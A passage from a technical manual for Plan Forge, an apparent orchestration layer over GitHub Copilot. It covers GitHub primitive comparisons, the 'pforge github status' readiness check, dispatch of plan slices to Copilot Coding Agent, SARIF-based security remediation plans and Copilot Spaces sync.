`.github/copilot-instructions.md`	Repo-wide Copilot context	GA
`.github/agents/`	Custom agent personas	GA on github.com (preview in JetBrains/Eclipse/Xcode)
`.github/hooks/`	Lifecycle hooks (preToolUse, postToolUse, sessionStart, etc.)	GA
`.github/skills/`	Repo-scoped skill definitions	GA
GitHub Actions	CI/CD runtime that powers Cloud Agent	GA
GitHub Advanced Security (GHAS)	Code scanning, secret scanning, Dependabot	GA
Copilot Spaces	Curated context bundles for chat	GA (chat-side; not yet a Cloud Agent execution context)
Copilot Metrics API	Adoption + flow metrics (active users, PR throughput, time-to-merge)	GA
Copilot SDK	Embed the Cloud Agent runtime in your own app	Public preview, April 2, 2026
Custom properties	Org-level governance primitive	GA
Org runner controls + firewall	Cloud Agent runtime governance	GA (April 2026)

This is a strong, coherent substrate. It is also explicitly just the substrate.

What GitHub deliberately leaves to the ecosystem (the Plan Forge lane)

These are the surfaces GitHub does not ship and shows no sign of shipping, based on direct evidence from GitHub's own docs and roadmap:

Gap	Evidence
Hardened plan as versioned artifact with scope contract, slices, validation gates, drift detection	Plan-mode is session-scoped one-shot; no plan file format, no scope contract, no slice persistence
Cross-repo / multi-service orchestration	Explicit single-repo limitation: "Copilot can only make changes in the repository specified when you start a task. Copilot cannot make changes across multiple repositories in one run."
Multi-model quorum / consensus per task	No built-in mechanism. Single model per session
Plan execution harness with per-slice gates and resume-from semantics	`copilot-setup-steps.yml` is one pre-flight hook; nothing slice-aware
Semantic eval harness (test pass rate, regression rate, plan-adherence)	Metrics API explicitly does not measure quality, only adoption + flow
Cost prediction per task / per plan before execution	Only post-hoc Actions + premium-request totals
Live programmatic watch of an in-flight agent from external tools	Session UI is in-product only; no public stream
Cross-org / cross-team fleet console with queue, capacity, SLA visibility	Only per-issue / per-project session UI
Pre-merge plan-adherence gates	No first-party concept of "this PR drifted from the approved plan"
Agent skills / instructions sync across N repos	Up to consumer (`.github-private` is the only template mechanism)
Multi-tenant cost budgets and prioritization	Not in product
A/B comparison of custom agents or models for the same task class	Not in product
Cross-team / cross-project semantic memory so lessons compound across pilots	Copilot Spaces is chat-side and repo-scoped; no semantic recall across teams or sessions
Closed-loop RCA → fix-proposal → validate-fix pipeline	`@copilot` on issues + GHAS Autofix are open-loop point features; no native bug registry, no multi-model RCA, no fix validation cycle
Coverity-style scan → triage → spawn-worker → fix loop for AI-generated drift	GHAS scans + Autofix on findings only; nothing that spawns a worker per finding and iterates to convergence
Deploy-aware lifecycle hooks (preDeploy / postSlice / preAgentHandoff) with severity gates	Existing hooks (preToolUse / postToolUse / sessionStart) are session-scoped; nothing fires before deploys with severity blocking
Idea → hardened-plan interview funnel with lane-scoped Q&A	Plan-mode is single-shot session output; no interview funnel, no lane classification, no progressive refinement
Pre-flight plan-quality scorer (scope-contract clarity, slice sizing, gate strength, forbidden-actions)	Nothing in product scores plan quality before execution
Specialized reviewer agent fleet (20+ read-only personas: arch / security / db / perf / a11y / multi-tenancy / CI-CD / compliance / dependency / observability)	Copilot Code Review is singular and chat-prompted; no first-party persona library
Remote-bridge approval flows with resume-on-approve (Slack / Teams / PagerDuty / Telegram / Discord)	GitHub notifications fire one-way; no inline-approve → resume-paused-slice flow
Deploy Journal + auto-generated runbook per plan	No first-party concept of "audit record per deploy" or "runbook from this plan"
… and more. The full capability index lives in the quick reference and the manual book index.

GitHub's positioning is consistent: wrap your tool/data source as an MCP server, layer your customization via the open file standards (AGENTS.md, Skills, instructions), and build your orchestration on top of the SDK. That is exactly the Plan Forge architecture.

How Plan Forge composes with each GitHub primitive

A 16-row reference for architects mapping each GitHub-native primitive to the Plan Forge surface that consumes it.

Per-primitive composition table (16 rows)

GitHub primitive	How Plan Forge consumes it	Where in Plan Forge
Copilot Cloud Agent	Plan Forge dispatches plan slices to CCA via `gh issue create --assignee @copilot`. Trajectories captured to `.forge/trajectories/<plan-slug>.jsonl`	`pforge-mcp/orchestrator.mjs` (`--worker copilot-coding-agent` mode)
AGENTS.md	Plan Forge generates and maintains AGENTS.md alongside `.github/copilot-instructions.md` so any AGENTS.md-aware agent (Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf) consumes Plan Forge context	`pforge-mcp/server.mjs` setup phase
`.github/instructions/`	Plan Forge ships ~18 instruction files covering architecture, security, testing, database, API, auth, error handling, deployment, performance, observability, version, status reporting, context fuel, self-repair, plan hardening	`templates/.github/instructions/`
`.github/copilot-instructions.md`	Plan Forge generates the project-scoped Copilot instructions during `setup.ps1` / `setup.sh`	`setup.ps1`, `setup.sh`
`.github/agents/`	Plan Forge ships 20 custom agent personas (architecture, database, security, deploy, performance, test-runner, API contracts, accessibility, multi-tenancy, CI/CD, observability, dependency, compliance, plus 6 pipeline agents and an audit classifier)	`templates/.github/agents/`
`.github/hooks/`	Plan Forge ships its own lifecycle hooks: `PreDeploy`, `PreCommit`, `PreAgentHandoff`, `PostSlice`, plus `plan-forge.json` hook configuration. Distinct from Claude Code's hook names.	`templates/.github/hooks/`
`.github/skills/`	Plan Forge ships 14 skills as `/` slash-commands: database-migration, staging-deploy, test-sweep, dependency-audit, security-audit, code-review, release-notes, api-doc-gen, onboarding, health-check, forge-execute, audit-loop, plus pipeline skills	`templates/.github/skills/`
MCP	Plan Forge ships its own MCP server (`pforge-mcp`) with 102 tools covering planning, execution, eval, observability, cost, memory, search, timeline, notifications. Auto-generates `.vscode/mcp.json`	`pforge-mcp/server.mjs`, `pforge-mcp/tools.json`
`github/github-mcp-server`	Plan Forge documents this as the canonical GitHub-side MCP integration. Plan Forge agents call it via the MCP plumbing they already speak	docs reference, `.vscode/mcp.json` example
GitHub Actions	Plan Forge plans can run as Actions workflows; `pforge run-plan` is callable from any runner. CCA itself runs in Actions and Plan Forge plans dispatched via CCA inherit Actions concurrency, runners, and minutes	`action.yml`
GitHub Advanced Security	Plan Forge's `forge_secret_scan`, `forge_dep_watch`, and security-audit skill complement GHAS, not replace it. Plan Forge surfaces GHAS findings into plan-aware bug reports	`pforge-mcp/notifications/`, `dependency-reviewer.agent.md`
Copilot Spaces	Plan Forge plan files + Scope Contract are the equivalent concept for autonomous execution. Spaces serves chat-side context curation; Plan Forge serves execution-time scope binding	docs reference
Copilot Metrics API	Plan Forge does not duplicate it. Plan Forge surfaces quality metrics (gate failure rates, drift scores, plan-adherence, regressions caught at gate boundary, cost per merged PR) that the Metrics API explicitly does not	`forge_health_trend`, `forge_drift_report`, `forge_cost_report`
Copilot SDK	Plan Forge does not embed the Copilot runtime. Plan Forge orchestrates across multiple agent runtimes (CCA, Claude Code, Codex, custom workers). The SDK is the right tool when you want to embed a single agent in your app; Plan Forge is the right tool when you want to coordinate many agent runs as a delivery pipeline	architecture reference
Custom properties	Plan Forge documents the recommended custom-property schema for governing per-team Plan Forge enablement, plan templates, and budget caps	`templates/docs/CUSTOMIZATION.md`
Org runner controls	Plan Forge dispatched plans inherit the org's runner policy. No conflict, no override needed	docs reference

Why this matters for the consolidation thesis

If your strategic direction is "consolidate on GitHub Enterprise + Copilot Enterprise," Plan Forge reinforces that choice rather than competing with it.

Cursor and Sourcegraph Amp are platform-agnostic by design. They work as well on GitLab and Bitbucket as on GitHub. Adopting them does not strengthen your GitHub investment.
GitHub Copilot Cloud Agent shipped the substrate but explicitly leaves orchestration to the ecosystem. Without an orchestration layer, the substrate is incomplete for fleet rollouts.
Plan Forge is the only project in the comparison set built specifically to extend GitHub primitives in the direction GitHub itself signaled is the ecosystem's lane. The architecture is a deliberate "yes, and" to GitHub's stack.

For Microsoft-shop enterprises pursuing the GitHub-native consolidation thesis, this is the cleanest path: GitHub for the substrate, Plan Forge for the orchestration layer, no third vendor in the picture.

Variations for Microsoft Foundry shops

For customers using Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes additionally with:

Azure OpenAI as a first-class LLM provider (alongside GitHub Copilot, Anthropic, OpenAI, xAI). Auth via Entra ID (recommended), API key, or managed identity. Endpoint format https://{resource}.openai.azure.com/openai/v1/. Customer configures deployment names, not model families.
Foundry Toolboxes as MCP-compatible endpoints. Plan Forge already speaks MCP; pointing .vscode/mcp.json at a Foundry Toolbox endpoint is config, not code.
Foundry App Insights as the OTel sink. Plan Forge OTel traces land in the same dashboards as the customer's Foundry agent runs.
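The endpoint format and the "deployment names, not model families" rule can be sketched as follows. The helper names and the returned config shape are hypothetical; only the URL pattern comes from the text above, and the resource-name check is a simplification.

```javascript
// Hypothetical sketch: build an Azure OpenAI base URL from a resource name.
function azureOpenAiBaseUrl(resourceName) {
  if (!/^[a-z0-9][a-z0-9-]*$/i.test(resourceName)) {
    throw new Error(`Invalid Azure resource name: ${resourceName}`);
  }
  return `https://${resourceName}.openai.azure.com/openai/v1/`;
}

// The "model" slot carries the customer's deployment name, not a model family.
function providerConfig(resourceName, deploymentName) {
  return { baseUrl: azureOpenAiBaseUrl(resourceName), model: deploymentName };
}

console.log(providerConfig("contoso", "team-a-gpt-deployment"));
```

Here `contoso` and `team-a-gpt-deployment` are placeholder values; substitute your own resource and deployment names.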

See Reference Architecture — Microsoft Foundry variant for the full picture.

Appendix I

Plan Forge on the GitHub Stack

A tour of the GitHub-native primitives Plan Forge integrates with, plus the readiness check for your repo.

When to read this chapter: you are running (or considering) Plan Forge against a repository hosted on GitHub, with GitHub Copilot, Copilot Coding Agent, GHAS, or Copilot Spaces in the picture.

When to skip it: you are on Bitbucket, GitLab, Azure DevOps, or anywhere else. None of this is required by Plan Forge; see Appendix C: Stack-Specific Notes for language-preset details, and Chapter 12: Extensions for the OSS extension surface.

Looking for the strategic framing instead? See Appendix H — GitHub Stack Alignment for the four-band AI SDLC stack diagram, the four harness pillars in plain English, the six outcome KPIs, and the consolidation thesis. This appendix (I) is the surface-by-surface technical reference; H is the executive-level companion.

Plan Forge does not require GitHub. It runs against any repo, with any agent (Copilot, Claude Code, Cursor, Codex), and against any CI system. But when the repo is on GitHub, Plan Forge has the deepest stack of integrations: eight first-class primitives it consumes today, plus several it dispatches to. This appendix is the single canonical reference for that integration surface.

Section 1 is the readiness check, a one-command snapshot of which GitHub primitives your repo currently has wired up. Section 2 is the surface-by-surface tour. Sections 3 (Copilot Coding Agent dispatch), 4 (GHAS remediation chains), 5 (Copilot Spaces sync), 6 (Metrics API leaderboard), 7 (BYOK and the multi-model picker), and 8 (other agent platforms: Claude Code, Cursor, Codex) are now live.

1. Is your repo set up? Run `pforge github status`

The fastest way to know which GitHub-native primitives Plan Forge can use against your repo is the introspection command:

pforge github status

Output is a checklist of the eight default checks, each marked with a glyph:

✓ pass: primitive is wired up correctly
⚠ warn: primitive is partially wired or recommended-but-missing
✗ fail: primitive is missing and Plan Forge integration depends on it
⊘ n/a: primitive does not apply to this repo (e.g. not a git clone)

Sample output, run against the Plan Forge repository itself:

GitHub stack readiness, E:\GitHub\Plan Forge
────────────────────────────────────────────────────────────────────────
  ✓ .github/copilot-instructions.md
      present
  ⚠ AGENTS.md
      missing, open agent standard not adopted
  ✓ .github/instructions/*.instructions.md
      7 instruction files found
  ✓ .github/prompts/*.prompt.md
      8 prompt files found
  ✓ .vscode/mcp.json
      Plan Forge MCP server registered
  ✓ .github/workflows/
      4 workflow files found
  ✓ git remote → github.com
      github.com remote configured
  ✓ gh CLI on PATH
      gh CLI available
────────────────────────────────────────────────────────────────────────
  7 pass · 1 warn · 0 fail · 0 n/a  (8 checks)

And against the Plan Forge testbed (a sample repo set up via setup.ps1):

Figure: `pforge github status` against the Plan Forge testbed, showing 7 pass, 1 warn, 0 fail, 0 n/a across 8 checks. Generated by `scripts/capture-github-status-screenshot.mjs`.

To get fix hints for every ⚠ and ✗ row, use the doctor subcommand:

pforge github doctor

For machine-readable output (e.g. piping into a dashboard or another tool), add --json:

pforge github status --json

The JSON shape is stable and documented in the MCP Server Reference under forge_github_status. Two extra SHOULD-tier checks (instruction-file applyTo: usage, copilot-instructions length) run when you add --extra.

Exit codes

Code	Meaning
`0`	No ✗ fail rows. Warns and N/A are allowed.
`1`	At least one ✗ fail row.
`2`	Invalid arguments to the CLI.

This makes the command CI-friendly: a workflow can fail-fast on missing primitives, or treat warnings as advisory only.
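The mapping from checklist rows to exit code can be sketched as below. The row shape (`name`, `status`) is a hypothetical stand-in for the documented JSON, so treat the field names as assumptions and check the forge_github_status reference for the real ones. Exit code 2 (invalid arguments) belongs to argument parsing and is not modelled here.

```javascript
// Hypothetical sketch: count statuses and derive the exit code from them.
const STATUSES = ["pass", "warn", "fail", "n/a"];

function summariseChecks(rows) {
  const counts = { pass: 0, warn: 0, fail: 0, "n/a": 0 };
  for (const row of rows) {
    if (!STATUSES.includes(row.status)) throw new Error(`Unknown status: ${row.status}`);
    counts[row.status] += 1;
  }
  return counts;
}

// 0 when there are no fail rows (warns and n/a are allowed), 1 otherwise.
function exitCodeFor(rows) {
  return summariseChecks(rows).fail > 0 ? 1 : 0;
}

const sampleRows = [
  { name: ".github/copilot-instructions.md", status: "pass" },
  { name: "AGENTS.md", status: "warn" },
  { name: "gh CLI on PATH", status: "pass" },
];
console.log(summariseChecks(sampleRows), exitCodeFor(sampleRows));
```

A CI job that wants warnings to be blocking as well could apply its own stricter rule to the same counts rather than relying on the exit code alone.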

From an MCP client (Copilot Chat, Claude Code, Cursor)

The same checklist is exposed as the forge_github_status MCP tool. From an in-IDE chat:

"Run forge_github_status on this repo and tell me which GitHub primitives I'm missing."

The agent receives the structured JSON and can answer with line-level precision, useful when you're evaluating Plan Forge inside an existing repo and don't want to leave the IDE.

2. The eight GitHub-native primitives Plan Forge consumes

Each row below is one check from pforge github status. The "What Plan Forge does with it" column is what makes this chapter different from the GitHub docs: it tells you exactly how Plan Forge uses the primitive, and which Plan Forge feature stops working if you remove it.

Primitive	What it is	What Plan Forge does with it
`.github/copilot-instructions.md`	Repo-wide context Copilot Chat reads on every conversation.	Generated by `setup.ps1` / `setup.sh`. Plan Forge writes the project overview, architecture summary, quick-command reference, and pipeline reference here. Re-generated by `pforge update` while preserving customizations.
`AGENTS.md`	Open standard adopted by Cursor, Codex, OpenAI, Anthropic, and GitHub for cross-agent context.	Generated alongside `copilot-instructions.md`. Lets Plan Forge support BYOK: the same context surface works whether the user picks Copilot, Cursor, Claude Code, or Codex.
`.github/instructions/*.instructions.md`	Path-scoped Copilot instructions (each file's `applyTo:` frontmatter targets a glob).	Plan Forge ships ~18 instruction files: `architecture-principles`, `git-workflow`, `testing`, `security`, `database`, etc. Each auto-loads when Copilot edits a matching file. The Step-2 Plan Hardener and Step-5 Reviewer reference these directly.
`.github/prompts/*.prompt.md`	Reusable prompt files Copilot Chat can invoke as slash commands.	Plan Forge ships the pipeline prompts: `step0-specify-feature`, `step1-preflight-check`, `step2-harden-plan`, `step3-execute-slice`, `step4-completeness-sweep`, `step5-review-gate`. The full Plan Forge pipeline runs through these in sequence.
`.vscode/mcp.json`	VS Code's MCP-server registry. Each entry exposes a server's tools to Copilot Chat.	Plan Forge registers itself here as `plan-forge`, exposing 102 MCP tools (`forge_run_plan`, `forge_estimate_quorum`, `forge_cost_report`, `forge_github_status`, `forge_lattice_query`, `forge_sync_memories`, …). See MCP Server Quick Start.
`.github/workflows/`	GitHub Actions, the CI surface.	Validation gates from Plan Forge plans can run as GitHub Actions jobs. The `regression-guard` command is designed to be triggered from a workflow on every PR. A future release will add an Actions composite for one-step Plan Forge dispatch.
git remote → github.com	Repository hosted on GitHub.	Pre-requisite for everything in Sections 3+: Copilot Coding Agent dispatch (creates issues + PRs against the repo), GHAS API access, Spaces sync, Metrics API ingestion. Without a github.com remote those features have no target.
GitHub CLI (`gh`)	GitHub's official command-line tool for issues, PRs, releases, and GHAS.	Plan Forge prefers `gh` for any GitHub API operation when it's installed (auth is already handled). Strict requirement for the SARIF ingestion command and for one-shot issue creation in `pforge run-plan --worker copilot-coding-agent`.

A note on optionality: not having every row green does not break Plan Forge. It limits which Plan Forge features are available. The CLI still runs end-to-end against any repo with any agent; the GitHub primitives give you the deepest, most automated path.

Figure: the five-layer view. Plan Forge's orchestration layer (amber) sits on top of the eight GitHub-native primitives (Layer 3) and dispatches to multiple agent runtimes (Layer 2) backed by any model (Layer 1), producing plan files, trajectories, and live GitHub artifacts (Layer 5). Every primitive is documented in this chapter, and every Plan Forge feature in the amber band has a section below.

3. Dispatching to Copilot Coding Agent

When your repo is hosted on GitHub and has Copilot Coding Agent enabled, Plan Forge can hand each slice of a plan off to the Coding Agent automatically, creating a GitHub Issue per slice, assigning it to @copilot, polling the resulting PR, and capturing the run trajectory back into the Plan Forge dashboard.

pforge run-plan --worker copilot-coding-agent docs/plans/my-feature-PLAN.md

The --worker copilot-coding-agent flag replaces the default in-process execution loop with the GitHub dispatch loop. Every other flag (--quorum, --estimate, --resume-from) works unchanged.

Issue body template — canonical vs per-stack

Each slice becomes a GitHub Issue. The body is assembled from two sources:

Canonical block (always present). Contains the slice title, scope contract, validation gate commands, and a reference to the plan file. This block is the same regardless of which tech stack the project uses.
Per-stack block (injected when a .github/instructions/project-profile.instructions.md exists). Appends the project's language, framework, test runner, and any Forbidden Actions so the Coding Agent has immediate context without reading the full plan.

The canonical block is produced by pforge-mcp/coding-agent-dispatch.mjs. The per-stack block is read from project-profile.instructions.md if present; if the file is absent, the block is silently omitted. You can inspect the issue body before creating it:

pforge run-plan --worker copilot-coding-agent --dry-run docs/plans/my-feature-PLAN.md

The --dry-run flag prints the would-be issue body for each slice and exits without touching GitHub.
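The two-block assembly described above can be pictured with a minimal sketch. This is not the code in pforge-mcp/coding-agent-dispatch.mjs; the function name `buildIssueBody`, the field names on `slice` and `profile`, and the heading layout are all assumptions made for illustration.

```javascript
// Hypothetical sketch: a canonical block plus an optional per-stack block.
// Field names and headings are illustrative, not Plan Forge's real template.
function buildIssueBody(slice, profile = null) {
  const canonical = [
    `## ${slice.title}`,
    "",
    "### Scope contract",
    slice.scopeContract,
    "",
    "### Validation gates",
    ...slice.gates.map((cmd) => `- ${cmd}`),
    "",
    `Plan file: ${slice.planFile}`,
  ];

  // No project profile: the per-stack block is omitted without any notice.
  if (!profile) return canonical.join("\n");

  const perStack = [
    "",
    "### Project profile",
    `- Language: ${profile.language}`,
    `- Framework: ${profile.framework}`,
    `- Test runner: ${profile.testRunner}`,
    ...profile.forbiddenActions.map((action) => `- Forbidden: ${action}`),
  ];
  return [...canonical, ...perStack].join("\n");
}
```

Calling `buildIssueBody(slice)` without a profile yields only the canonical block, which mirrors the silent omission described above.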

PR detection — linked-issue search, branch pattern, fallback order

After creating the issue and assigning it to @copilot, Plan Forge polls for the resulting PR. It uses a two-stage fallback:

Stage	Strategy	How it works
1 (primary)	Linked-issue search	Runs `gh pr list --search "closes #<issue-number>"` to match PRs that reference the issue in their body. Works reliably when the Coding Agent follows GitHub's "closes" keyword convention.
2 (fallback)	Branch pattern	Scans open PRs whose branch name contains `copilot/` or the slugified slice title. Used when the agent opens a PR without a closes link (rare, but observed in edge cases).

If neither stage finds a PR within the configured timeout (default: 30 minutes, configurable via .forge.json#codingAgent.pollTimeoutMinutes), the slice is marked stalled and Plan Forge moves to the next slice or stops, depending on --on-stall (skip | abort, default abort).
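As an illustration of the fallback order, here is a minimal sketch that applies both stages to a list of open PRs that has already been fetched. The PR object shape (`number`, `body`, `branch`), the helper names, and the slug rules are assumptions; the real dispatcher queries GitHub through `gh` rather than filtering an in-memory array.

```javascript
// Hypothetical slugifier; the real slug rules are not specified in this chapter.
function slugify(title) {
  return title.toLowerCase().replace(/[^a-z0-9]+/g, "-").replace(/^-+|-+$/g, "");
}

// prs: array of { number, body, branch } describing open PRs (assumed shape).
function findPrForSlice(prs, issueNumber, sliceTitle) {
  // Stage 1: linked-issue match on the "closes #N" keyword in the PR body.
  // The trailing \b stops "#12" from matching "#123".
  const closes = new RegExp(`closes\\s+#${issueNumber}\\b`, "i");
  const linked = prs.find((pr) => closes.test(pr.body || ""));
  if (linked) return { pr: linked, stage: 1 };

  // Stage 2: branch name contains "copilot/" or the slugified slice title.
  const slug = slugify(sliceTitle);
  const byBranch = prs.find(
    (pr) => pr.branch.includes("copilot/") || (slug !== "" && pr.branch.includes(slug))
  );
  if (byBranch) return { pr: byBranch, stage: 2 };

  // Nothing yet: the caller keeps polling until the timeout, then marks the slice stalled.
  return null;
}
```

Returning the stage number alongside the PR makes it easy to log which strategy matched, which helps when diagnosing a stalled slice.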

Trajectory capture

When a PR is merged, Plan Forge fetches the Coding Agent's session log from the PR's Copilot Activity tab via the GitHub API and appends it to the plan's trajectory file at .forge/trajectories/<plan-slug>.jsonl. This makes the Coding Agent's reasoning searchable by pforge timeline and forge_master_ask just like any other execution session.

Pre-flight checks

Before Plan Forge creates any GitHub Issues for a --worker copilot-coding-agent run, it executes a pre-flight check that includes the copilot-coding-agent-assignable probe. This probe calls the GitHub Assignees API to verify that @copilot is an assignable user on the repository. If it is not, typically because Copilot Coding Agent has not been enabled at the org or repo level, the orchestrator stops immediately with a fix-hint rather than creating issues that will never be picked up.

When it runs, the probe returns one of three states:

Status	Meaning	Action taken by orchestrator
pass	`@copilot` is assignable on this repo; Copilot Coding Agent is enabled and ready.	Pre-flight continues; slice execution proceeds normally.
warn	Copilot Coding Agent is not enabled; `--assignee @copilot` would be silently dropped.	Promoted to a hard fail. Execution stops before any issue is created. Fix-hint links to GitHub's docs for enabling Copilot Coding Agent at the repo or org level.
fail	API error, token lacks `repo` scope, network unreachable, or GitHub returned 4xx/5xx.	Execution stops. Fix-hint describes the token scope requirement and suggests `gh auth status`.

You can run the probe manually via pforge github status with --gh-token:

pforge github status --gh-token

Without --gh-token, the check returns na ("skipped, pass --gh-token to probe") and does not make any API calls. The probe is intentionally opt-in on the status command to keep the hot path free of network I/O, but it always runs automatically when the orchestrator's pre-flight fires for a --worker copilot-coding-agent dispatch.
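The status handling above fits in a small lookup. The sketch below is only a restatement of the table and the `na` note in code; the function name `preflightAction` and the returned action labels are hypothetical, not part of the Plan Forge API.

```javascript
// Maps a probe status to what happens next, following the table above.
// "na" only appears on the manual status command when --gh-token is omitted.
function preflightAction(status) {
  switch (status) {
    case "pass":
      return "continue"; // @copilot is assignable; dispatch proceeds
    case "warn":
      return "stop"; // promoted to a hard fail before any issue is created
    case "fail":
      return "stop"; // API, token scope, or network problem
    case "na":
      return "skipped"; // no API call was made
    default:
      throw new Error(`unknown probe status: ${status}`);
  }
}
```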

Prerequisite: gh CLI must be authenticated (gh auth status) and the repo must have Copilot Coding Agent enabled at the org or repo level. Run pforge github status --gh-token; all checks, including copilot-coding-agent-assignable, should pass before you use --worker copilot-coding-agent.

4. GHAS-driven remediation

GitHub Advanced Security (GHAS) surfaces security findings (CodeQL alerts, secret scans, Dependabot advisories) as SARIF files or API responses. pforge plan-from-sarif turns a SARIF result into a runnable Plan Forge plan with one slice per finding, severity-ordered so the highest-severity issues execute first.

pforge plan-from-sarif codeql-results.sarif --out docs/plans/ghas-remediation-PLAN.md

The generated plan is a standard Plan Forge plan. Run it with any worker (pforge run-plan, --worker copilot-coding-agent, etc.) and all the usual flags apply.

Reading SARIF from stdin

Pass - as the file argument to read SARIF from stdin. This lets you pipe directly from gh or any SARIF producer without writing an intermediate file:

# Pipe CodeQL results from the GitHub API
gh api /repos/{owner}/{repo}/code-scanning/analyses/latest/sarif | \
  pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md

# Or from a local CodeQL database run
codeql database analyze my-db --format=sarifv2.1.0 --output=- | \
  pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md

Severity ordering and slice structure

Findings are sorted by SARIF level in descending order of severity (error → warning → note), then by rule ID for deterministic ordering within a level. Each finding becomes one slice with:

Slice title: [SARIF] <ruleId>, <location>
Scope contract: the finding's message, the affected file and line range, and the recommended fix from the rule metadata (if present)
Validation gate: re-runs CodeQL on the affected file and asserts zero findings for that rule

Use --min-severity warning to exclude note-level findings from the plan. Use --rule-filter <ruleId> to include only a specific rule. Both flags can be combined.
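The ordering and filtering rules can be sketched against the standard SARIF 2.1.0 layout (`runs[].results[]` with `level` and `ruleId`). This is an illustrative approximation rather than the plan-from-sarif implementation: `orderFindings` and its option names are hypothetical, and treating a missing `level` as `warning` follows the SARIF default rather than anything stated in this chapter.

```javascript
// Rank per SARIF level: lower number = higher severity.
const LEVEL_RANK = new Map([["error", 0], ["warning", 1], ["note", 2]]);

function orderFindings(sarif, { minSeverity = "note", ruleFilter = null } = {}) {
  const cutoff = LEVEL_RANK.get(minSeverity);
  return (sarif.runs || [])
    .flatMap((run) => run.results || [])
    // Assumption: a result without an explicit level counts as "warning".
    .map((result) => ({ ...result, level: result.level || "warning" }))
    // Drop levels outside error/warning/note (for example "none").
    .filter((result) => LEVEL_RANK.has(result.level))
    .filter((result) => LEVEL_RANK.get(result.level) <= cutoff)
    .filter((result) => ruleFilter === null || result.ruleId === ruleFilter)
    .sort((a, b) => {
      const byLevel = LEVEL_RANK.get(a.level) - LEVEL_RANK.get(b.level);
      if (byLevel !== 0) return byLevel;
      // Plain string comparison keeps the order locale-independent.
      return a.ruleId < b.ruleId ? -1 : a.ruleId > b.ruleId ? 1 : 0;
    });
}
```

Each element of the returned array would then map to one slice, in order.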

Integration with the Plan Forge security surface

pforge plan-from-sarif is the inbound half of the GHAS integration. The outbound half is the existing PreDeploy LiveGuard hook: before any deploy slice executes, forge_secret_scan + forge_env_diff run automatically and block on severity ≥ high. The /security-audit skill combines both: it invokes pforge plan-from-sarif against the latest SARIF, presents the generated plan for review, then hands off to pforge run-plan.

"Run /security-audit and generate a remediation plan for all high-severity CodeQL findings."

That one prompt triggers the full pipeline: SARIF fetch → plan generation → plan review → optional execution. See the Skills Reference for the full /security-audit flow.

5. Copilot Spaces sync

Copilot Spaces is GitHub's team-scoped knowledge hub, a curated collection of files, instructions, and context that Copilot Chat draws from automatically when a Space is selected. Plan Forge integrates with Spaces via pforge sync-spaces: a single command that pushes the active plan, instruction files, and Plan Forge tool catalog into a designated Space, giving every chat session in the org instant access to the current plan state without manual copy-paste.

pforge sync-spaces

By default this targets the Space named plan-forge in the same org as the repo's git remote. Override with --space <owner/name>. For org-wide broadcast, use --org <slug> to push to every Space in the org that has the plan-forge-sync topic tag.

What gets synced

pforge sync-spaces builds a payload from four sources and uploads them as versioned Space files:

Source	Space path	Update frequency
Active plan file (the one matching `.forge/active-plan`)	`plan-forge/active-plan.md`	Every sync
All `.github/instructions/*.instructions.md` files	`plan-forge/instructions/<name>.md`	Only when file hash changes
MCP tool catalog (`forge_capabilities` snapshot)	`plan-forge/tool-catalog.md`	Only when version changes
Project profile (`.github/instructions/project-profile.instructions.md` if present)	`plan-forge/project-profile.md`	Only when file hash changes

Files are uploaded using the GitHub Spaces API, authenticated via the gh CLI; run gh auth status before your first sync. Unchanged files (same SHA-256) are skipped to stay within API rate limits.
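The skip-if-unchanged rule can be sketched as a comparison of two hash manifests. The sketch assumes the SHA-256 digests are already computed and that the hashes from the previous sync are available locally; `selectUploads`, the manifest shape, and the `always` list (standing in for the "Every sync" row of the table) are hypothetical.

```javascript
// local:  { "<space path>": "<sha256 hex>" } for the payload built in this run
// remote: same shape, recorded at the previous sync (assumed to be available)
function selectUploads(local, remote, { force = false, always = ["plan-forge/active-plan.md"] } = {}) {
  return Object.keys(local)
    .filter((path) => force || always.includes(path) || local[path] !== remote[path])
    .sort();
}
```

With `force: true` every path is returned, which corresponds to the behaviour described for `--force`.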

Flags

Flag	Default	Effect
`--space <owner/name>`	Inferred from remote + `.forge.json`	Target a specific Space by owner and name.
`--org <slug>`	(single repo Space)	Broadcast to all Spaces in the org tagged `plan-forge-sync`.
`--dry-run`	(off)	Print what would be uploaded without making API calls.
`--force`	(off)	Re-upload all files even if SHA-256 matches.
`--no-instructions`	(instructions included)	Skip the `.github/instructions/` payload. Useful when the Space already has a curated instruction set you don't want overwritten.

The AI-SDLC-Hub pattern

Many enterprise readouts describe an "AI-SDLC-Hub", a single Space that every developer in the org selects by default, giving all Copilot Chat sessions a shared view of the team's architecture decisions, coding standards, and active delivery plan. pforge sync-spaces is the automation layer for that pattern: instead of a human curating the Space manually, the hub is kept current by a scheduled CI job or a post-commit hook.

A minimal GitHub Actions workflow to sync on every push to main:

name: Plan Forge Spaces Sync
on:
  push:
    branches: [main]
    paths:
      - 'docs/plans/**'
      - '.github/instructions/**'
      - '.forge.json'

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with: { node-version: '20' }
      - run: npm install -g plan-forge
      - run: pforge sync-spaces --space ${{ vars.PFORGE_SPACES_TARGET }}
        env:
          GH_TOKEN: ${{ secrets.PFORGE_SPACES_TOKEN }}

Store the target Space name as a repository variable (PFORGE_SPACES_TARGET) and the gh-compatible token as a secret. The token needs copilot_spaces:write scope.

Persisting the target Space

To avoid specifying --space on every invocation, write the target into .forge.json:

{
  "github": {
    "spacesTarget": "acme-org/plan-forge-hub"
  }
}

pforge sync-spaces reads this field and uses it as the default target. The field can also be set via the CLI:

pforge config set github.spacesTarget acme-org/plan-forge-hub

Roadmap

The current release ships the core sync path: plan, instructions, tool catalog, and project profile. A future release will add bidirectional sync, pulling conversation summaries and noteworthy Q&A threads from the Space back into the Plan Forge timeline so decision rationale captured in chat is preserved alongside the plan execution history. The pforge github status readiness check will also gain a dedicated Spaces row at that point.

Prerequisite: gh CLI must be authenticated (gh auth status) and the target Copilot Space must exist before the first sync. Create a Space at github.com/copilot/spaces and note the owner/name slug. Run pforge github status to verify the rest of the GitHub stack readiness.

6. Metrics API + Plan Forge unified leaderboard

